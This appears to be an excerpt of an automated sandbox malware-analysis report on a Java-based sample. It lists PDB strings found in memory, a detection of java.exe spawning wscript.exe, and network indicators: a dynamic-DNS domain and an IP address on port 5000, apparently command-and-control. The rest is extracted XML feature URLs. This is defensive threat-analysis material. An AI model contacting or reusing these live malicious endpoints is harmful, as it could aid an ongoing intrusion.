        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libverify\verify.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsdt\jsdt.pdb source: xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjaas\jaas_nt.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pcsc\j2pcsc.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005000000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: d:\a01\_work\38\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: xcopy.exe, 00000015.00000003.1741105307.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawtaccessbridge-32\JAWTAccessBridge-32.pdb source: xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb,,+ source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700108241.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2gss\j2gss.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawt\jawt.pdb source: xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsspi_bridge\sspi_bridge.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb## source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb11 source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsoundds\jsoundds.pdb source: xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnpt\npt.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdbEE, source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700293859.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A707000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699288851.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb:: source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb'' source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Exploit detected, runtime environment starts unknown processes
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe

        Networking

        barindex
        Uses dynamic DNS services
        Source: unknownDNS query: name: pnauco5.ddns.net
        Source: global trafficTCP traffic: 192.168.2.4:49739 -> 103.151.123.225:5000
        Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownDNS traffic detected: queries for: pnauco5.ddns.net
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/3
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/allow-java-encodings
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/allow-java-encodingsorg/a9
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/allow-java-encodingsxA
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/continue-after-fatal-errors/inter=
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/create-cdata-nodeszs
        Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
        Source: java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes?
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion9
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace/
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/g3
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations9
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsmen9
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsmpl
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/include-comments
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/parser-settings
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatespacheO
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only/
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlye/
        Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/namespace-growth
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd:
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdch:
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsnterna7
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refss
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs/3
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
